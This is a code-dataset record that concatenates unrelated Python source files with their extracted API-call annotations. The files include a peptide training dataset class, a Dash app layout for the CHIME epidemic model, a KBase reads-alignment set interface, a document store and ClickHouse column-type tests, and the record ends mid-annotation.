the integer index. Further, the padding character must be "-".
is_validation : bool
Whether the dataset will be used for validation (or testing)
sequence_column : str
The name of the column which contains the amino acid sequences
max_len : int
The maximum length for a peptide. Peptides longer than this will be
truncated, and shorter peptides will be padded to this length.
seed : int
Seed for the random number generator. This is used to randomly select
the second sequence in each of the instances.
name : str
A name for the dataset instance. This is mostly used for logging.
"""
def __init__(self,
dataset_path:str,
aa_encoding_map:string_utils.encoding_map_type,
is_validation:bool=False,
sequence_column:str=_DEFAULT_SEQUENCE_COLUMN,
max_len:int=_DEFAULT_MAX_LEN,
seed:int=_DEFAULT_SEED,
name:str=_DEFAULT_NAME):
self.aa_encoding_map = aa_encoding_map
self.is_validation = is_validation
self.sequence_column = sequence_column
self.max_len = max_len
self.seed = seed
self.name = name
self.rng = np.random.default_rng(self.seed)
df_peptides = PeptideDataset.load(dataset_path, sequence_column, filters=["standard_aa_only"])
self.aa_sequences = df_peptides[self.sequence_column].values
self.encoded_aa_sequences = string_utils.encode_all_sequences(
sequences=self.aa_sequences,
encoding_map=self.aa_encoding_map,
maxlen=self.max_len,
pad_value='-',
same_length=False
)
self.encoded_aa_sequences = self.encoded_aa_sequences.astype(int)
if self.is_validation:
self._matching_validation_item = np.random.permutation(len(self.aa_sequences))
def log(self, msg:str, level:int=logging.INFO) -> None:
""" Log `msg` using `level` using the module-level logger """
msg = "[{}] {}".format(self.name, msg)
logger.log(level, msg)
def __len__(self) -> int:
return len(self.aa_sequences)
def __getitem__(self, idx) -> PeptideEncoderTrainingDatasetItem:
x = idx
# and choose an appropriate matching index based on the dataset status
if self.is_validation:
y = self._matching_validation_item[idx]
else:
# select the second sequence randomly
y = self.rng.integers(low=0, high=len(self), size=1)
# the rng returns an array...
y = y[0]
encoded_xs = self.encoded_aa_sequences[x]
encoded_ys = self.encoded_aa_sequences[y]
peptide_xs = self.aa_sequences[x]
peptide_ys = self.aa_sequences[y]
similarities = sequence_similarity_utils.get_snebula_score(peptide_xs, peptide_ys)
encoded_xs = torch.as_tensor(encoded_xs, dtype=torch.long)
encoded_ys = torch.as_tensor(encoded_ys, dtype=torch.long)
similarities = torch.as_tensor(similarities, dtype=torch.float32)
ret = PeptideEncoderTrainingDatasetItem(
peptide_xs, peptide_ys, encoded_xs, encoded_ys, similarities
)
return ret
def get_trimmed_peptide_lengths(self, peptides) -> np.ndarray:
""" Extract the trimmed length of the given peptides, which accounts for max_len """
peptide_lengths = [len(p) for p in peptides]
trimmed_peptide_lengths = np.clip(peptide_lengths, 0, self.max_len)
return trimmed_peptide_lengths
@classmethod
def load(clazz,
dataset_path:Optional[str],
aa_encoding_map:string_utils.encoding_map_type,
is_validation:bool,
name:str) -> Optional["PeptideEncoderTrainingDataset"]:
""" Load the dataset given by `key` in `self.config`
Additionally, `name` will be used for the name of the dataset.
Parameters
----------
dataset_path : typing.Optional[str]
The path to the dataset
aa_encoding_map : pyllars.string_utils.encoding_map_type
A mapping from each amino acid to its integer index.
is_validation : bool
Whether the dataset will be used for validation (or testing)
name : str
The name for the dataset, if it is in the config file. Example:
"TrainingSet"
Returns
-------
dataset : typing.Optional[AAEncoderDataset]
If `key` is in `self.config`, then `dataset` will be the dataset
object based on that file. Otherwise, this function returns `None`.
"""
dataset = None
if dataset_path is not None:
dataset = PeptideEncoderTrainingDataset (
dataset_path=dataset_path,
aa_encoding_map=aa_encoding_map,
is_validation=is_validation,
name=name
)
return dataset
| [
"logging.getLogger",
"numpy.clip",
"pyllars.string_utils.encode_all_sequences",
"torch.as_tensor",
"numpy.random.default_rng",
"lifesci.sequence_similarity_utils.get_snebula_score",
"lifesci.peptide_dataset.PeptideDataset.load"
] | [((310, 337), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (327, 337), False, 'import logging\n'), ((3411, 3443), 'numpy.random.default_rng', 'np.random.default_rng', (['self.seed'], {}), '(self.seed)\n', (3432, 3443), True, 'import numpy as np\n'), ((3467, 3552), 'lifesci.peptide_dataset.PeptideDataset.load', 'PeptideDataset.load', (['dataset_path', 'sequence_column'], {'filters': "['standard_aa_only']"}), "(dataset_path, sequence_column, filters=['standard_aa_only']\n )\n", (3486, 3552), False, 'from lifesci.peptide_dataset import PeptideDataset\n'), ((3654, 3816), 'pyllars.string_utils.encode_all_sequences', 'string_utils.encode_all_sequences', ([], {'sequences': 'self.aa_sequences', 'encoding_map': 'self.aa_encoding_map', 'maxlen': 'self.max_len', 'pad_value': '"""-"""', 'same_length': '(False)'}), "(sequences=self.aa_sequences, encoding_map\n =self.aa_encoding_map, maxlen=self.max_len, pad_value='-', same_length=\n False)\n", (3687, 3816), True, 'import pyllars.string_utils as string_utils\n'), ((5023, 5090), 'lifesci.sequence_similarity_utils.get_snebula_score', 'sequence_similarity_utils.get_snebula_score', (['peptide_xs', 'peptide_ys'], {}), '(peptide_xs, peptide_ys)\n', (5066, 5090), True, 'import lifesci.sequence_similarity_utils as sequence_similarity_utils\n'), ((5113, 5158), 'torch.as_tensor', 'torch.as_tensor', (['encoded_xs'], {'dtype': 'torch.long'}), '(encoded_xs, dtype=torch.long)\n', (5128, 5158), False, 'import torch\n'), ((5180, 5225), 'torch.as_tensor', 'torch.as_tensor', (['encoded_ys'], {'dtype': 'torch.long'}), '(encoded_ys, dtype=torch.long)\n', (5195, 5225), False, 'import torch\n'), ((5249, 5299), 'torch.as_tensor', 'torch.as_tensor', (['similarities'], {'dtype': 'torch.float32'}), '(similarities, dtype=torch.float32)\n', (5264, 5299), False, 'import torch\n'), ((5700, 5741), 'numpy.clip', 'np.clip', (['peptide_lengths', '(0)', 'self.max_len'], {}), '(peptide_lengths, 0, self.max_len)\n', (5707, 5741), True, 'import numpy as np\n')] |
"""Combines all components
The `sidebar` component combines all the inputs while other components potentially
have callbacks.
To add or remove components, adjust the `setup`.
If callbacks are present, also adjust `CALLBACK_INPUTS`, `CALLBACK_OUTPUTS` and
`callback_body`.
"""
from collections import OrderedDict
from dash_bootstrap_components import Row, Col
from dash_bootstrap_components.themes import BOOTSTRAP
from dash_html_components import Script, Div
from penn_chime.defaults import Constants
from penn_chime.models import SimSirModel
from chime_dash.app.components.base import Component, HTMLComponentError
from chime_dash.app.components.sidebar import Sidebar
from chime_dash.app.components.header import Header
from chime_dash.app.components.intro import Intro, ToolDetails
from chime_dash.app.components.additions import Additions
from chime_dash.app.components.visualizations import Visualizations
from chime_dash.app.components.definitions import Definitions
from chime_dash.app.components.footer import Footer
from chime_dash.app.components.navbar import Navbar
class Body(Component):
"""
"""
external_stylesheets = [
"https://www1.pennmedicine.org/styles/shared/penn-medicine-header.css",
BOOTSTRAP,
]
def __init__(self, language, defaults):
"""
"""
super().__init__(language, defaults)
self.components = OrderedDict(
sidebar=Sidebar(language, defaults),
header=Header(language, defaults),
intro=Intro(language, defaults),
tool_details=ToolDetails(language, defaults),
visualizations=Visualizations(language, defaults),
additions=Additions(language, defaults),
definitions=Definitions(language, defaults),
footer=Footer(language, defaults),
navbar=Navbar(language, defaults),
)
self.callback_outputs = []
self.callback_inputs = OrderedDict()
self.callback_keys = []
for component in self.components.values():
self.callback_outputs += component.callback_outputs
self.callback_inputs.update(component.callback_inputs)
def get_html(self):
"""Glues individual setup components together
"""
return Div(
children=self.components["navbar"].html
+ [
Row(
children=[
Col(
id="sidebar",
children=self.components["sidebar"].html,
width=3,
className="mt-4",
),
Col(width=1),
Col(
self.components["header"].html
+ self.components["intro"].html
+ self.components["tool_details"].html
+ self.components["visualizations"].html
+ self.components["additions"].html
+ self.components["definitions"].html
+ self.components["footer"].html,
width=8,
className="mt-4",
),
],
className="container",
),
]
)
def callback(self, *args, **kwargs):
"""
"""
kwargs = dict(zip(self.callback_inputs, args))
pars = self.components["sidebar"].parse_form_parameters(**kwargs)
kwargs["model"] = SimSirModel(pars)
kwargs["pars"] = pars
callback_returns = []
for component in self.components.values():
try:
callback_returns += component.callback(**kwargs)
except Exception as error:
raise HTMLComponentError(component, error)
return callback_returns
| [
"collections.OrderedDict",
"chime_dash.app.components.sidebar.Sidebar",
"chime_dash.app.components.intro.Intro",
"chime_dash.app.components.additions.Additions",
"chime_dash.app.components.visualizations.Visualizations",
"chime_dash.app.components.definitions.Definitions",
"chime_dash.app.components.int... | [((1954, 1967), 'collections.OrderedDict', 'OrderedDict', ([], {}), '()\n', (1965, 1967), False, 'from collections import OrderedDict\n'), ((3618, 3635), 'penn_chime.models.SimSirModel', 'SimSirModel', (['pars'], {}), '(pars)\n', (3629, 3635), False, 'from penn_chime.models import SimSirModel\n'), ((1432, 1459), 'chime_dash.app.components.sidebar.Sidebar', 'Sidebar', (['language', 'defaults'], {}), '(language, defaults)\n', (1439, 1459), False, 'from chime_dash.app.components.sidebar import Sidebar\n'), ((1480, 1506), 'chime_dash.app.components.header.Header', 'Header', (['language', 'defaults'], {}), '(language, defaults)\n', (1486, 1506), False, 'from chime_dash.app.components.header import Header\n'), ((1526, 1551), 'chime_dash.app.components.intro.Intro', 'Intro', (['language', 'defaults'], {}), '(language, defaults)\n', (1531, 1551), False, 'from chime_dash.app.components.intro import Intro, ToolDetails\n'), ((1578, 1609), 'chime_dash.app.components.intro.ToolDetails', 'ToolDetails', (['language', 'defaults'], {}), '(language, defaults)\n', (1589, 1609), False, 'from chime_dash.app.components.intro import Intro, ToolDetails\n'), ((1638, 1672), 'chime_dash.app.components.visualizations.Visualizations', 'Visualizations', (['language', 'defaults'], {}), '(language, defaults)\n', (1652, 1672), False, 'from chime_dash.app.components.visualizations import Visualizations\n'), ((1696, 1725), 'chime_dash.app.components.additions.Additions', 'Additions', (['language', 'defaults'], {}), '(language, defaults)\n', (1705, 1725), False, 'from chime_dash.app.components.additions import Additions\n'), ((1751, 1782), 'chime_dash.app.components.definitions.Definitions', 'Definitions', (['language', 'defaults'], {}), '(language, defaults)\n', (1762, 1782), False, 'from chime_dash.app.components.definitions import Definitions\n'), ((1803, 1829), 'chime_dash.app.components.footer.Footer', 'Footer', (['language', 'defaults'], {}), '(language, defaults)\n', (1809, 1829), False, 'from chime_dash.app.components.footer import Footer\n'), ((1850, 1876), 'chime_dash.app.components.navbar.Navbar', 'Navbar', (['language', 'defaults'], {}), '(language, defaults)\n', (1856, 1876), False, 'from chime_dash.app.components.navbar import Navbar\n'), ((3891, 3927), 'chime_dash.app.components.base.HTMLComponentError', 'HTMLComponentError', (['component', 'error'], {}), '(component, error)\n', (3909, 3927), False, 'from chime_dash.app.components.base import Component, HTMLComponentError\n'), ((2437, 2527), 'dash_bootstrap_components.Col', 'Col', ([], {'id': '"""sidebar"""', 'children': "self.components['sidebar'].html", 'width': '(3)', 'className': '"""mt-4"""'}), "(id='sidebar', children=self.components['sidebar'].html, width=3,\n className='mt-4')\n", (2440, 2527), False, 'from dash_bootstrap_components import Row, Col\n'), ((2688, 2700), 'dash_bootstrap_components.Col', 'Col', ([], {'width': '(1)'}), '(width=1)\n', (2691, 2700), False, 'from dash_bootstrap_components import Row, Col\n'), ((2726, 3026), 'dash_bootstrap_components.Col', 'Col', (["(self.components['header'].html + self.components['intro'].html + self.\n components['tool_details'].html + self.components['visualizations'].\n html + self.components['additions'].html + self.components[\n 'definitions'].html + self.components['footer'].html)"], {'width': '(8)', 'className': '"""mt-4"""'}), "(self.components['header'].html + self.components['intro'].html + self.\n components['tool_details'].html + self.components['visualizations'].\n html + self.components['additions'].html + self.components[\n 'definitions'].html + self.components['footer'].html, width=8,\n className='mt-4')\n", (2729, 3026), False, 'from dash_bootstrap_components import Row, Col\n')] |
"""crwal_and_scrap trying to gathering news with web scrawl"""
from crwal_and_scrap.main import main
main()
| [
"crwal_and_scrap.main.main"
] | [((103, 109), 'crwal_and_scrap.main.main', 'main', ([], {}), '()\n', (107, 109), False, 'from crwal_and_scrap.main import main\n')] |
from dataclasses import dataclass, field
from typing import List
__NAMESPACE__ = "a"
@dataclass
class Nametest:
choice: List[object] = field(
default_factory=list,
metadata={
"type": "Elements",
"choices": (
{
"name": "_ele",
"type": str,
"namespace": "a",
},
{
"name": "_-",
"type": str,
"namespace": "a",
},
{
"name": "_.",
"type": str,
"namespace": "a",
},
{
"name": "_9",
"type": str,
"namespace": "a",
},
{
"name": "___",
"type": str,
"namespace": "a",
},
{
"name": "a_a",
"type": str,
"namespace": "a",
},
{
"name": "a.a",
"type": str,
"namespace": "a",
},
{
"name": "ele",
"type": str,
"namespace": "a",
},
),
}
)
@dataclass
class Root(Nametest):
class Meta:
name = "root"
namespace = "a"
| [
"dataclasses.field"
] | [((142, 620), 'dataclasses.field', 'field', ([], {'default_factory': 'list', 'metadata': "{'type': 'Elements', 'choices': ({'name': '_ele', 'type': str, 'namespace':\n 'a'}, {'name': '_-', 'type': str, 'namespace': 'a'}, {'name': '_.',\n 'type': str, 'namespace': 'a'}, {'name': '_9', 'type': str, 'namespace':\n 'a'}, {'name': '___', 'type': str, 'namespace': 'a'}, {'name': 'a_a',\n 'type': str, 'namespace': 'a'}, {'name': 'a.a', 'type': str,\n 'namespace': 'a'}, {'name': 'ele', 'type': str, 'namespace': 'a'})}"}), "(default_factory=list, metadata={'type': 'Elements', 'choices': ({\n 'name': '_ele', 'type': str, 'namespace': 'a'}, {'name': '_-', 'type':\n str, 'namespace': 'a'}, {'name': '_.', 'type': str, 'namespace': 'a'},\n {'name': '_9', 'type': str, 'namespace': 'a'}, {'name': '___', 'type':\n str, 'namespace': 'a'}, {'name': 'a_a', 'type': str, 'namespace': 'a'},\n {'name': 'a.a', 'type': str, 'namespace': 'a'}, {'name': 'ele', 'type':\n str, 'namespace': 'a'})})\n", (147, 620), False, 'from dataclasses import dataclass, field\n')] |
import pprint
from app.models import Cepage
data = []
counter = 0
with open('static_data.tsv', 'r') as file:
for line in file:
if counter == 0:
headers = line.split('\t')
print(len(headers))
else:
print(len(line.split('\t')))
data.append(dict(zip(headers, line.replace('\u202f', '').split('\t'))))
counter += 1
pprint.pprint(data)
for wine in data:
try:
id_ = wine['id']
if len(id_) > 0:
id_ = int(id_)
name = wine[u'Nom du cépage']
regions = wine['Régions']
sous_regions = wine['Sous-régions']
superficie_france = wine['Superficie en France (ha)']
superficie_monde = wine['Superficie mondiale (ha)']
red = wine['Cépage'] == 'Noir'
vignobles = wine['Vignobles']
# changing types
superficie_france = int(superficie_france) if len(superficie_france) > 0 else None
superficie_monde = int(superficie_monde) if len(superficie_monde) > 0 else None
c = Cepage(
id=id_,
name=name,
regions=regions,
vignobles=vignobles,
sous_regions=sous_regions,
superficie_france=superficie_france,
superficie_monde=superficie_monde,
red=red
)
db.session.add(c)
db.session.commit()
except ValueError:
continue
| [
"app.models.Cepage",
"pprint.pprint"
] | [((389, 408), 'pprint.pprint', 'pprint.pprint', (['data'], {}), '(data)\n', (402, 408), False, 'import pprint\n'), ((1090, 1269), 'app.models.Cepage', 'Cepage', ([], {'id': 'id_', 'name': 'name', 'regions': 'regions', 'vignobles': 'vignobles', 'sous_regions': 'sous_regions', 'superficie_france': 'superficie_france', 'superficie_monde': 'superficie_monde', 'red': 'red'}), '(id=id_, name=name, regions=regions, vignobles=vignobles,\n sous_regions=sous_regions, superficie_france=superficie_france,\n superficie_monde=superficie_monde, red=red)\n', (1096, 1269), False, 'from app.models import Cepage\n')] |
from tastypie.api import Api
from encuestas.api.user import UserResource
from encuestas.api.encuesta import EncuestaResource
from encuestas.api.grupo import GrupoResource
from encuestas.api.pregunta import PreguntaResource
from encuestas.api.opcion import OpcionResource
from encuestas.api.link import LinkResource
from encuestas.api.respuesta import RespuestaResource
v1_api = Api(api_name='v1')
v1_api.register(UserResource())
v1_api.register(EncuestaResource())
v1_api.register(GrupoResource())
v1_api.register(PreguntaResource())
v1_api.register(OpcionResource())
v1_api.register(LinkResource())
v1_api.register(RespuestaResource())
| [
"encuestas.api.encuesta.EncuestaResource",
"encuestas.api.link.LinkResource",
"encuestas.api.user.UserResource",
"tastypie.api.Api",
"encuestas.api.grupo.GrupoResource",
"encuestas.api.pregunta.PreguntaResource",
"encuestas.api.opcion.OpcionResource",
"encuestas.api.respuesta.RespuestaResource"
] | [((380, 398), 'tastypie.api.Api', 'Api', ([], {'api_name': '"""v1"""'}), "(api_name='v1')\n", (383, 398), False, 'from tastypie.api import Api\n'), ((415, 429), 'encuestas.api.user.UserResource', 'UserResource', ([], {}), '()\n', (427, 429), False, 'from encuestas.api.user import UserResource\n'), ((447, 465), 'encuestas.api.encuesta.EncuestaResource', 'EncuestaResource', ([], {}), '()\n', (463, 465), False, 'from encuestas.api.encuesta import EncuestaResource\n'), ((483, 498), 'encuestas.api.grupo.GrupoResource', 'GrupoResource', ([], {}), '()\n', (496, 498), False, 'from encuestas.api.grupo import GrupoResource\n'), ((516, 534), 'encuestas.api.pregunta.PreguntaResource', 'PreguntaResource', ([], {}), '()\n', (532, 534), False, 'from encuestas.api.pregunta import PreguntaResource\n'), ((552, 568), 'encuestas.api.opcion.OpcionResource', 'OpcionResource', ([], {}), '()\n', (566, 568), False, 'from encuestas.api.opcion import OpcionResource\n'), ((586, 600), 'encuestas.api.link.LinkResource', 'LinkResource', ([], {}), '()\n', (598, 600), False, 'from encuestas.api.link import LinkResource\n'), ((618, 637), 'encuestas.api.respuesta.RespuestaResource', 'RespuestaResource', ([], {}), '()\n', (635, 637), False, 'from encuestas.api.respuesta import RespuestaResource\n')] |
"""
An interface for handling sets of ReadsAlignments.
"""
from pprint import pprint
from SetAPI.generic.SetInterfaceV1 import SetInterfaceV1
from SetAPI import util
class ReadsAlignmentSetInterfaceV1:
def __init__(self, workspace_client):
self.workspace_client = workspace_client
self.set_interface = SetInterfaceV1(workspace_client)
def save_reads_alignment_set(self, ctx, params):
if 'data' in params and params['data'] is not None:
self._validate_reads_alignment_set_data(params['data'])
else:
raise ValueError('"data" parameter field required to save a ReadsAlignmentSet')
save_result = self.set_interface.save_set(
'KBaseSets.ReadsAlignmentSet',
ctx['provenance'],
params
)
info = save_result[0]
return {
'set_ref': str(info[6]) + '/' + str(info[0]) + '/' + str(info[4]),
'set_info': info
}
def _validate_reads_alignment_set_data(self, data):
# Normalize the object, make empty strings where necessary
if "description" not in data:
data["description"] = ""
if "items" not in data or len(data.get("items", [])) == 0:
raise ValueError("A ReadsAlignmentSet must contain at "
"least one ReadsAlignment reference.")
refs = list()
for item in data["items"]:
refs.append(item["ref"])
if "label" not in item:
item["label"] = ""
ref_list = list(map(lambda r: {"ref": r}, refs))
# Get all the genome ids from our ReadsAlignment references (it's the genome_id key in
# the object metadata). Make a set out of them.
# If there's 0 or more than 1 item in the set, then either those items are bad, or they're
# aligned against different genomes.
info = self.workspace_client.get_object_info3({"objects": ref_list, "includeMetadata": 1})
num_genomes = len(set([item[10]["genome_id"] for item in info["infos"]]))
if num_genomes == 0 or num_genomes > 1:
raise ValueError("All ReadsAlignments in the set must be aligned "
"against the same genome reference.")
def get_reads_alignment_set(self, ctx, params):
"""
If the set is a KBaseSets.ReadsAlignmentSet, it gets returned as-is.
If it's a KBaseRNASeq.RNASeqAlignmentSet, a few things get juggled.
1. We try to figure out the object references for the alignments (which are optional)
2. From each ref, we try to figure out the condition, and apply those as labels (also
might be optional)
"""
set_type, obj_spec = self._check_get_reads_alignment_set_params(params)
include_item_info = False
if 'include_item_info' in params:
if params['include_item_info'] == 1:
include_item_info = True
include_set_item_ref_paths = False
if 'include_set_item_ref_paths' in params:
if params['include_set_item_ref_paths'] == 1:
include_set_item_ref_paths = True
ref_path_to_set = []
if 'ref_path_to_set' in params and len(params['ref_path_to_set']) > 0:
ref_path_to_set = params['ref_path_to_set']
if "KBaseSets" in set_type:
# If it's a KBaseSets type, then we know the usual interface will work...
return self.set_interface.get_set(
params['ref'],
include_item_info,
ref_path_to_set,
include_set_item_ref_paths
)
else:
# ...otherwise, we need to fetch it directly from the workspace and tweak it into the
# expected return object
obj_data = self.workspace_client.get_objects2({"objects": [obj_spec]})["data"][0]
obj = obj_data["data"]
obj_info = obj_data["info"]
alignment_ref_list = list()
if "sample_alignments" in obj:
alignment_ref_list = obj["sample_alignments"]
else:
# this is a list of dicts of random strings -> alignment refs
# need them all as a set, then emit as a list.
reads_to_alignments = obj["mapped_alignments_ids"]
refs = set()
for mapping in reads_to_alignments:
refs.update(mapping.values())
alignment_ref_list = list(refs)
alignment_items = [{"ref": i} for i in alignment_ref_list]
item_infos = self.workspace_client.get_object_info3(
{"objects": alignment_items, "includeMetadata": 1})["infos"]
for idx, ref in enumerate(alignment_items):
alignment_items[idx]["label"] = item_infos[idx][10].get("condition", None)
if include_item_info:
alignment_items[idx]["info"] = item_infos[idx]
"""
If include_set_item_ref_paths is set, then add a field ref_path in alignment items
"""
if include_set_item_ref_paths:
util.populate_item_object_ref_paths(alignment_items, obj_spec)
return {
"data": {
"items": alignment_items,
"description": ""
},
"info": obj_info
}
def _check_get_reads_alignment_set_params(self, params):
if 'ref' not in params or params['ref'] is None:
raise ValueError('"ref" parameter field specifiying the reads alignment set is required')
elif not util.check_reference(params['ref']):
raise ValueError('"ref" parameter must be a valid workspace reference')
if 'include_item_info' in params:
if params['include_item_info'] not in [0, 1]:
raise ValueError('"include_item_info" parameter field can only be set to 0 or 1')
obj_spec = util.build_ws_obj_selector(params.get('ref'), params.get('ref_path_to_set', []))
info = self.workspace_client.get_object_info3({"objects": [obj_spec]})
return info["infos"][0][2], obj_spec
| [
"SetAPI.util.populate_item_object_ref_paths",
"SetAPI.util.check_reference",
"SetAPI.generic.SetInterfaceV1.SetInterfaceV1"
] | [((325, 357), 'SetAPI.generic.SetInterfaceV1.SetInterfaceV1', 'SetInterfaceV1', (['workspace_client'], {}), '(workspace_client)\n', (339, 357), False, 'from SetAPI.generic.SetInterfaceV1 import SetInterfaceV1\n'), ((5211, 5273), 'SetAPI.util.populate_item_object_ref_paths', 'util.populate_item_object_ref_paths', (['alignment_items', 'obj_spec'], {}), '(alignment_items, obj_spec)\n', (5246, 5273), False, 'from SetAPI import util\n'), ((5710, 5745), 'SetAPI.util.check_reference', 'util.check_reference', (["params['ref']"], {}), "(params['ref'])\n", (5730, 5745), False, 'from SetAPI import util\n')] |
import collections
import inspect
import json
import jsonschema
import os
import sys
from pprint import pprint
from slugify import slugify
from ...dicthelpers import data_merge
from ..basestore import LinkedStore, linkages
from ..basestore import HeritableDocumentSchema, JSONSchemaCollection, formatChecker
from ..basestore import CatalogUpdateFailure
from ...stores import abspath
from ...utils import normalize, normpath
from ...filetypes import infer_filetype
DEFAULT_LINK_FIELDS = list()
class ProcessUpdateFailure(CatalogUpdateFailure):
pass
class ProcessDocument(HeritableDocumentSchema):
"""Defines metadata for a Process Entity"""
def __init__(self, inheritance=True, **kwargs):
super(ProcessDocument, self).__init__(inheritance, **kwargs)
self.update_id()
class ProcessRecord(collections.UserDict):
"""New document for ProcessStore with schema enforcement"""
def __init__(self, value, *args, **kwargs):
# if 'file_id' not in value:
# value['file_id'] = 'file.tacc.' + uuid.uuid1().hex
value = dict(value)
self.schema = ProcessDocument()
for k in self.schema.filter_keys():
try:
del value[k]
except KeyError:
pass
jsonschema.validate(value, self.schema.to_dict(),
format_checker=formatChecker())
super().__init__(value, *args, **kwargs)
class ProcessStore(LinkedStore):
"""Manage storage and retrieval of ProcessDocument records"""
LINK_FIELDS = DEFAULT_LINK_FIELDS
def __init__(self, mongodb, config={}, session=None, **kwargs):
super(ProcessStore, self).__init__(mongodb, config, session)
schema = ProcessDocument(**kwargs)
super(ProcessStore, self).update_attrs(schema)
self.setup(update_indexes=kwargs.get('update_indexes', False))
def add_update_document(self, document_dict, uuid=None, token=None, strategy='merge'):
if 'process_id' not in document_dict:
suggested_id = encode_name(document_dict['name'])
raise KeyError("Process document must have a 'processe_id'. " +
"Based on the provided name, here is a suggestion: {}".format(suggested_id))
return super().add_update_document(document_dict,
uuid=uuid, token=token,
strategy=strategy)
def get_typeduuid(self, payload, binary=False):
identifier_string = None
if isinstance(payload, dict):
if 'name' in payload:
payload['name'] = normpath(payload['name'])
identifier_string = self.get_linearized_values(payload)
else:
identifier_string = normpath(str(payload))
# print('IDENTIFIER.string', identifier_string)
return super().get_typeduuid(identifier_string, binary)
class StoreInterface(ProcessStore):
pass
def encode_name(textstring, separator='_', stopwords=[], case_insensitive=False):
return separator.join(slug for slug in slugify(
textstring, stopwords=stopwords,
lowercase=case_insensitive).split('-'))
| [
"slugify.slugify"
] | [((3095, 3163), 'slugify.slugify', 'slugify', (['textstring'], {'stopwords': 'stopwords', 'lowercase': 'case_insensitive'}), '(textstring, stopwords=stopwords, lowercase=case_insensitive)\n', (3102, 3163), False, 'from slugify import slugify\n')] |
from copy import deepcopy
import pytest
from snuba.clickhouse.columns import (
UUID,
AggregateFunction,
Array,
ColumnType,
Date,
DateTime,
Enum,
FixedString,
Float,
IPv4,
IPv6,
Nested,
ReadOnly,
)
from snuba.clickhouse.columns import SchemaModifiers as Modifier
from snuba.clickhouse.columns import String, UInt
TEST_CASES = [
pytest.param(
String(Modifier(nullable=True)),
String(),
String(),
"Nullable(String)",
id="strings",
),
pytest.param(
UUID(Modifier(readonly=True)),
UUID(),
UUID(Modifier(nullable=True)),
"UUID",
id="UUIDs",
),
pytest.param(IPv4(None), IPv4(), IPv4(Modifier(nullable=True)), "IPv4", id="IPs",),
pytest.param(IPv6(None), IPv6(), IPv6(Modifier(nullable=True)), "IPv6", id="IPs",),
pytest.param(
FixedString(32, Modifier(nullable=True)),
FixedString(32),
FixedString(64, Modifier(nullable=True)),
"Nullable(FixedString(32))",
id="fixed strings",
),
pytest.param(
UInt(8, Modifier(nullable=True)),
UInt(8),
UInt(16, Modifier(nullable=True)),
"Nullable(UInt8)",
id="integers",
),
pytest.param(
Float(64, Modifier(nullable=True)),
Float(64),
Float(32, Modifier(nullable=True)),
"Nullable(Float64)",
id="floats",
),
pytest.param(Date(), Date(), Date(Modifier(nullable=True)), "Date", id="dates",),
pytest.param(
DateTime(),
DateTime(),
DateTime(Modifier(nullable=True)),
"DateTime",
id="datetimes",
),
pytest.param(
Array(String(Modifier(nullable=True))),
Array(String()),
Array(String()),
"Array(Nullable(String))",
id="arrays",
),
pytest.param(
Nested(
[("key", String()), ("val", String(Modifier(nullable=True)))],
Modifier(nullable=True),
),
Nested([("key", String()), ("val", String())]),
Nested([("key", String()), ("val", String())], Modifier(nullable=True)),
"Nullable(Nested(key String, val Nullable(String)))",
id="nested",
),
pytest.param(
AggregateFunction("uniqIf", [UInt(8), UInt(32)], Modifier(nullable=True)),
AggregateFunction("uniqIf", [UInt(8), UInt(32)]),
AggregateFunction("uniqIf", [UInt(8)], Modifier(nullable=True)),
"Nullable(AggregateFunction(uniqIf, UInt8, UInt32))",
id="aggregated",
),
pytest.param(
Enum([("a", 1), ("b", 2)], Modifier(nullable=True)),
Enum([("a", 1), ("b", 2)]),
Enum([("a", 1), ("b", 2)]),
"Nullable(Enum('a' = 1, 'b' = 2))",
id="enums",
),
]
@pytest.mark.parametrize("col_type, raw_type, different_type, for_schema", TEST_CASES)
def test_methods(
col_type: ColumnType,
raw_type: ColumnType,
different_type: ColumnType,
for_schema: str,
) -> None:
assert col_type == deepcopy(col_type)
assert col_type != different_type
# Test it is not equal to a type of different class.
assert col_type != ColumnType(Modifier(readonly=True))
assert col_type.for_schema() == for_schema
assert col_type.get_raw() == raw_type
modified = col_type.set_modifiers(col_type.get_modifiers())
assert modified is not col_type
assert modified == col_type
assert col_type.set_modifiers(Modifier(readonly=True)).has_modifier(ReadOnly)
| [
"snuba.clickhouse.columns.IPv6",
"snuba.clickhouse.columns.Date",
"snuba.clickhouse.columns.UUID",
"snuba.clickhouse.columns.DateTime",
"snuba.clickhouse.columns.Float",
"pytest.mark.parametrize",
"snuba.clickhouse.columns.SchemaModifiers",
"snuba.clickhouse.columns.UInt",
"snuba.clickhouse.columns.... | [((2792, 2881), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""col_type, raw_type, different_type, for_schema"""', 'TEST_CASES'], {}), "('col_type, raw_type, different_type, for_schema',\n TEST_CASES)\n", (2815, 2881), False, 'import pytest\n'), ((448, 456), 'snuba.clickhouse.columns.String', 'String', ([], {}), '()\n', (454, 456), False, 'from snuba.clickhouse.columns import String, UInt\n'), ((466, 474), 'snuba.clickhouse.columns.String', 'String', ([], {}), '()\n', (472, 474), False, 'from snuba.clickhouse.columns import String, UInt\n'), ((598, 604), 'snuba.clickhouse.columns.UUID', 'UUID', ([], {}), '()\n', (602, 604), False, 'from snuba.clickhouse.columns import UUID, AggregateFunction, Array, ColumnType, Date, DateTime, Enum, FixedString, Float, IPv4, IPv6, Nested, ReadOnly\n'), ((705, 715), 'snuba.clickhouse.columns.IPv4', 'IPv4', (['None'], {}), '(None)\n', (709, 715), False, 'from snuba.clickhouse.columns import UUID, AggregateFunction, Array, ColumnType, Date, DateTime, Enum, FixedString, Float, IPv4, IPv6, Nested, ReadOnly\n'), ((717, 723), 'snuba.clickhouse.columns.IPv4', 'IPv4', ([], {}), '()\n', (721, 723), False, 'from snuba.clickhouse.columns import UUID, AggregateFunction, Array, ColumnType, Date, DateTime, Enum, FixedString, Float, IPv4, IPv6, Nested, ReadOnly\n'), ((793, 803), 'snuba.clickhouse.columns.IPv6', 'IPv6', (['None'], {}), '(None)\n', (797, 803), False, 'from snuba.clickhouse.columns import UUID, AggregateFunction, Array, ColumnType, Date, DateTime, Enum, FixedString, Float, IPv4, IPv6, Nested, ReadOnly\n'), ((805, 811), 'snuba.clickhouse.columns.IPv6', 'IPv6', ([], {}), '()\n', (809, 811), False, 'from snuba.clickhouse.columns import UUID, AggregateFunction, Array, ColumnType, Date, DateTime, Enum, FixedString, Float, IPv4, IPv6, Nested, ReadOnly\n'), ((940, 955), 'snuba.clickhouse.columns.FixedString', 'FixedString', (['(32)'], {}), '(32)\n', (951, 